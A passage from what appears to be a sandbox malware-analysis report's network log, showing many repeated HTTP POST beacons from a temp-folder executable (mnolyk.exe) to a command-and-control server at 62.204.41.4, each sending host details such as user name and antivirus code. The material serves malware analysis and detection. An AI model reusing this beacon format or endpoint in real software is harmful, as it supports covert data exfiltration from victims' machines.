                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      387192.168.2.75008262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:46.560439110 CET502OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:46.625701904 CET502INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:46 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      388192.168.2.75008362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:46.810774088 CET503OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:46.876943111 CET503INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:46 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      389192.168.2.75008462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:47.056885004 CET504OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:47.123337030 CET504INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:47 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      39192.168.2.74973362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:11.073843002 CET143OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:11.142923117 CET143INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:11 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      390192.168.2.75008562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:47.307738066 CET505OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:47.372236013 CET505INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:47 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      391192.168.2.75008662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:47.567671061 CET506OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:47.632725000 CET506INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:47 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      392192.168.2.75008762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:47.809633017 CET507OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:47.874619007 CET507INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:47 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      393192.168.2.75008862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:48.057972908 CET508OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:48.123852015 CET508INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:48 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      394192.168.2.75008962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:48.291497946 CET509OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:48.359700918 CET509INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:48 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      395192.168.2.75009062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:48.540225983 CET510OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:48.605078936 CET510INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:48 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      396192.168.2.75009162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:48.773540020 CET511OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:48.838476896 CET511INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:48 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      397192.168.2.75009262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:49.011979103 CET512OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:49.082272053 CET512INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:49 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      398192.168.2.75009362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:49.276434898 CET513OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:49.342191935 CET513INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:49 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      399192.168.2.75009462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:49.510005951 CET514OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:49.573791981 CET514INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:49 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      4192.168.2.74969862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:02.520210981 CET108OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:02.582041979 CET108INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:02 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      40192.168.2.74973462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:11.313399076 CET144OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:11.377012014 CET144INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:11 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      400192.168.2.75009562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:49.744924068 CET515OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:49.807482958 CET515INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:49 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      401192.168.2.75009662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:49.987227917 CET516OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:50.054502964 CET516INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:50 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      402192.168.2.75009762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:50.388047934 CET517OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:50.452862024 CET517INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:50 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      403192.168.2.75009862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:50.686542034 CET518OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
